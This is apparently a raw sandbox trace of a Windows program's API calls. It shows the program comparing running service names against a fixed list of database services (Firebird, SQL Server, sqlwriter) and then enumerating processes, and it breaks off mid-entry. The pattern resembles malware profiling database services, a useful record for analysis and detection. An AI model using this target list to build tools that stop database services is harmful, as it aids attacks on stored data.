lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0154.587] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0154.587] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0154.587] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0154.587] lstrlenW (lpString="FontCache") returned 9 [0154.587] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0154.587] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0154.587] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0154.587] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0154.587] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0154.588] lstrlenW (lpString="gpsvc") returned 5 [0154.588] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0154.588] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0154.588] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0154.588] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0154.588] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0154.588] lstrlenW (lpString="iphlpsvc") returned 8 [0154.588] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0154.588] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0154.588] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0154.588] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0154.588] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0154.588] lstrlenW (lpString="KeyIso") returned 6 [0154.588] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0154.588] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0154.588] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0154.589] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0154.589] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0154.589] lstrlenW (lpString="LanmanServer") returned 12 [0154.589] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0154.589] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0154.589] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0154.589] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0154.589] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0154.589] lstrlenW (lpString="LanmanWorkstation") returned 17 [0154.589] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0154.589] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0154.589] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0154.589] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0154.589] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0154.589] lstrlenW (lpString="lfsvc") returned 5 [0154.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0154.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0154.590] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0154.590] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0154.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0154.590] lstrlenW (lpString="lmhosts") returned 7 [0154.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0154.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0154.590] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0154.590] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0154.590] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0154.590] lstrlenW (lpString="LSM") returned 3 [0154.590] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0154.590] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0154.590] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0154.590] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0154.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0154.591] lstrlenW (lpString="MpsSvc") returned 6 [0154.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0154.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0154.591] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0154.591] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0154.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0154.591] lstrlenW (lpString="NcbService") returned 10 [0154.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0154.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0154.591] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0154.591] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0154.591] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0154.591] lstrlenW (lpString="netprofm") returned 8 [0154.591] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0154.591] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0154.592] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0154.592] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0154.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0154.592] lstrlenW (lpString="NgcSvc") returned 6 [0154.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0154.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0154.592] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0154.592] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0154.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0154.592] lstrlenW (lpString="NlaSvc") returned 6 [0154.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0154.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0154.592] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0154.592] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0154.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0154.592] lstrlenW (lpString="nsi") returned 3 [0154.592] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0154.592] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0154.592] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0154.592] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0154.592] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0154.592] lstrlenW (lpString="PcaSvc") returned 6 [0154.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0154.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0154.593] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0154.593] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0154.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0154.593] lstrlenW (lpString="PlugPlay") returned 8 [0154.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0154.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0154.593] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0154.593] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0154.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0154.593] lstrlenW (lpString="Power") returned 5 [0154.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0154.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0154.593] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0154.593] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0154.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0154.593] lstrlenW (lpString="ProfSvc") returned 7 [0154.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0154.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0154.593] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0154.593] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0154.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0154.593] lstrlenW (lpString="RpcEptMapper") returned 12 [0154.593] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0154.593] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0154.593] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0154.593] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0154.593] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0154.593] lstrlenW (lpString="RpcSs") returned 5 [0154.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0154.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0154.594] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0154.594] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0154.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0154.594] lstrlenW (lpString="SamSs") returned 5 [0154.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0154.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0154.594] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0154.594] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0154.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0154.594] lstrlenW (lpString="Schedule") returned 8 [0154.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0154.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0154.594] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0154.594] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0154.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0154.594] lstrlenW (lpString="SecurityHealthService") returned 21 [0154.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0154.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0154.594] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0154.594] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0154.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0154.594] lstrlenW (lpString="SENS") returned 4 [0154.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0154.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0154.594] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0154.594] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0154.594] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0154.594] lstrlenW (lpString="ShellHWDetection") returned 16 [0154.594] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0154.594] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0154.594] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0154.595] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0154.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0154.595] lstrlenW (lpString="Spooler") returned 7 [0154.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0154.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0154.595] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0154.595] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0154.595] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0154.595] lstrlenW (lpString="StateRepository") returned 15 [0154.595] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0154.595] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0154.595] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0154.595] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0154.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0154.894] lstrlenW (lpString="SysMain") returned 7 [0154.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0154.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0154.894] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0154.894] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0154.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0154.894] lstrlenW (lpString="SystemEventsBroker") returned 18 [0154.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0154.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0154.894] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0154.894] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0154.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0154.895] lstrlenW (lpString="Themes") returned 6 [0154.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0154.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0154.895] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0154.895] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0154.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0154.895] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0154.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0154.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0154.895] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0154.895] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0154.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0154.895] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0154.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0154.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0154.896] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0154.896] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0154.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x71c3f0 | out: hHeap=0x6a0000) returned 1 [0154.896] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2dc [0154.906] Process32FirstW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.907] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.909] lstrlenW (lpString="System") returned 6 [0154.909] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.910] lstrlenW (lpString="smss.exe") returned 8 [0154.910] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.913] lstrlenW (lpString="csrss.exe") returned 9 [0154.913] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.914] lstrlenW (lpString="wininit.exe") returned 11 [0154.914] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.915] lstrlenW (lpString="csrss.exe") returned 9 [0154.915] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.916] lstrlenW (lpString="winlogon.exe") returned 12 [0154.916] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.917] lstrlenW (lpString="services.exe") returned 12 [0154.917] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.918] lstrlenW (lpString="lsass.exe") returned 9 [0154.918] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0154.919] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0154.919] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0154.919] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0154.920] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.925] lstrlenW (lpString="svchost.exe") returned 11 [0154.925] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.928] lstrlenW (lpString="svchost.exe") returned 11 [0154.929] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.930] lstrlenW (lpString="dwm.exe") returned 7 [0154.930] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.931] lstrlenW (lpString="svchost.exe") returned 11 [0154.931] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.933] lstrlenW (lpString="svchost.exe") returned 11 [0154.933] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.933] lstrlenW (lpString="svchost.exe") returned 11 [0154.934] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.934] lstrlenW (lpString="svchost.exe") returned 11 [0154.934] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.073] lstrlenW (lpString="svchost.exe") returned 11 [0155.073] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.074] lstrlenW (lpString="svchost.exe") returned 11 [0155.074] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.074] lstrlenW (lpString="svchost.exe") returned 11 [0155.074] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.075] lstrlenW (lpString="svchost.exe") returned 11 [0155.075] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.076] lstrlenW (lpString="svchost.exe") returned 11 [0155.076] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.080] lstrlenW (lpString="svchost.exe") returned 11 [0155.080] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0155.081] lstrlenW (lpString="spoolsv.exe") returned 11 [0155.081] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.082] lstrlenW (lpString="svchost.exe") returned 11 [0155.082] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0155.083] lstrlenW (lpString="audiodg.exe") returned 11 [0155.083] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0155.084] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0155.084] Process32NextW (in: hSnapshot=0x2dc, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, 